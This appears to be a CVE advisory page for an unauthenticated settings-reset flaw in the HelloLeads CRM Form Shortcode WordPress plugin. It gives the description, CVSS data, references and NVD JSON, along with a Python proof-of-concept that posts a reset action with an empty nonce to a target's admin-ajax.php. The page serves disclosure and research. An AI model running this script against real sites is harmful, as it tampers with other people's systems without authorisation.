CVE-2025-12696

Description

The HelloLeads CRM Form Shortcode WordPress plugin through 1.0 does not have authorisation and CSRF check when resetting its settings, allowing unauthenticated users to reset them

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HelloLeads CRM Form Shortcode WordPress插件 <= 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12696 PoC - HelloLeads CRM Form Shortcode Unauthenticated Settings Reset
# Target: WordPress site with HelloLeads CRM Form Shortcode plugin <= 1.0

def reset_settings(target_url):
    """
    Exploit for CVE-2025-12696
    Unauthenticated settings reset via admin-ajax.php
    """
    # Target the WordPress AJAX endpoint
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    # Plugin's reset action (identified from plugin code)
    data = {
        'action': 'helloleads_reset_settings',
        'nonce': ''  # No nonce required due to missing CSRF protection
    }
    
    try:
        print(f"[*] Sending reset request to {ajax_url}")
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful - settings may have been reset")
            print(f"[*] Response: {response.text}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12696.py <target_url>")
        print("Example: python cve-2025-12696.py http://example.com")
        sys.exit(1)
    
    reset_settings(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12696
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12696
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12696/
[4] VulDB https://vuldb.com/cve/CVE-2025-12696
[5] https://wpscan.com/vulnerability/e552dfc8-c6e1-4605-bc36-30dc4066eaea/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12696", "sourceIdentifier": "[email protected]", "published": "2025-12-14T06:15:37.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HelloLeads CRM Form Shortcode WordPress plugin through 1.0 does not have authorisation and CSRF check when resetting its settings, allowing unauthenticated users to reset them"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/e552dfc8-c6e1-4605-bc36-30dc4066eaea/", "source": "[email protected]"}]}}